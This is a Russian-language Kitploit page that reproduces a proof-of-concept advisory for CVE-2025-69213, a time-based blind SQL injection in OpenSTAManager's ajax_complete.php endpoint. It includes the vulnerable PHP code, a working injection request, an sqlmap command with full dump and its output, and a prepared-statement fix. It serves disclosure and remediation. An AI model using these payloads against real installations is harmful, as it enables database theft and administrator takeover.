Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-69213 — Репозиторий proof-of-concept для CVE-2025-69213, демонстрирующий уязвимость SQL-инъекции в конечной точке ajax_complete.php в OpenSTAManager с эксплуатацией методом временной слепой инъекции и руководством по устранению. | Kitploit
Инструменты/GitHubGitHub/lukasz-rybak/cve-2025-69213
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеБезопасность Баз Данных
GitHublukasz-rybak/cve-2025-69213

CVE-2025-69213

Репозиторий proof-of-concept для CVE-2025-69213, демонстрирующий уязвимость SQL-инъекции в конечной точке ajax_complete.php в OpenSTAManager с эксплуатацией методом временной слепой инъекции и руководством по устранению.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Репозиторий
15 месяцев назадЕщё не проверено
Поделиться

CVE-2025-69213: OpenSTAManager имеет SQL-инъекцию в ajax_complete.php (конечная точка get_sedi)

Обзор

ПолеСведения
Идентификатор CVECVE-2025-69213
СерьёзностьВЫСОКАЯ
УведомлениеПосмотреть уведомление
ОбнаруженоLukasz Rybak

Затронутые продукты

  • devcode-it/openstamanager (версии: <= 2.9.8)

Классификация CWE

  • CWE-89: Некорректная нейтрализация специальных элементов, используемых в SQL-команде («SQL-инъекция»)

Детали

Краткое описание

Уязвимость SQL-инъекции существует в конечной точке ajax_complete.php при обработке операции get_sedi. Аутентифицированный злоумышленник может внедрить вредоносный SQL-код через параметр idanagrafica, что приведёт к несанкционированному доступу к базе данных.

Доказательство концепции

Уязвимый код

Файл: modules/anagrafiche/ajax/complete.php:28

root@kitploit:~
case 'get_sedi':
    $idanagrafica = get('idanagrafica');
    $q = "SELECT id, CONCAT_WS( ' - ', nomesede, citta ) AS descrizione 
          FROM an_sedi 
          WHERE idanagrafica='".$idanagrafica."' ...";
    $rs = $dbo->fetchArray($q);

Поток данных

  1. Источник: $_GET['idanagrafica'] → get('idanagrafica')
  2. Уязвимость: Пользовательский ввод напрямую конкатенируется в SQL-запрос с одинарными кавычками.
  3. Приёмник: $dbo->fetchArray($q) выполняет вредоносный запрос.

Эксплуатация

Ручное доказательство (Time-based Blind SQLi):

root@kitploit:~
GET /ajax_complete.php?op=get_sedi&idanagrafica=1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND '1'='1 HTTP/1.1
Host: localhost:8081
Cookie: PHPSESSID=<valid-session>
Изображение

Эксплуатация с помощью SQLMap:

root@kitploit:~
sqlmap -u "http://localhost:8081/ajax_complete.php?op=get_sedi&idanagrafica=1*" \
  --cookie="PHPSESSID=<session>" \
  --dbms=MySQL \
  --technique=T \
  --level=3 \
  --dump

Вывод SQLMap:

root@kitploit:~
[INFO] URI parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
Parameter: #1* (URI)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: idanagrafica=1' AND (SELECT 2572 FROM (SELECT(SLEEP(5)))oOnc)-- rhVF
back-end DBMS: MySQL >= 5.0.12
Изображение

Влияние

  • Извлечение данных: Полное извлечение базы данных, включая учётные данные пользователей, данные клиентов, финансовые записи.
  • Повышение привилегий: Изменение таблицы zz_users для получения доступа администратора.
  • Целостность данных: Несанкционированное изменение или удаление записей.
  • Потенциальное удалённое выполнение кода (RCE): Через SELECT ... INTO OUTFILE, если разрешения файловой системы позволяют.

Затронутые версии

  • OpenSTAManager: Подтверждено в последней версии (на декабрь 2025 года).
  • Все версии, использующие эту конечную точку, вероятно, затронуты.

Устранение

Замените прямую конкатенацию на подготовленные выражения:

До:

root@kitploit:~
$idanagrafica = get('idanagrafica');
$q = "SELECT ... WHERE idanagrafica='".$idanagrafica."' ...";

После:

root@kitploit:~
$idanagrafica = get('idanagrafica');
$q = "SELECT ... WHERE idanagrafica=".prepare($idanagrafica)." ...";

Ссылки

  • OWASP SQL-инъекция: https://owasp.org/www-community/attacks/SQL_Injection
  • CWE-89: Некорректная нейтрализация специальных элементов, используемых в SQL-команде

Авторство

Обнаружено: Łukasz Rybak

Источники

  • https://github.com/devcode-it/openstamanager/security/advisories/GHSA-w995-ff8h-rppg
  • https://nvd.nist.gov/vuln/detail/CVE-2025-69213
  • https://github.com/advisories/GHSA-w995-ff8h-rppg

Отказ от ответственности

Этот CVE был ответственно раскрыт в соответствии с практикой скоординированного раскрытия уязвимостей. Предоставленная информация предназначена только для образовательных и защитных целей.

Скачать инструмент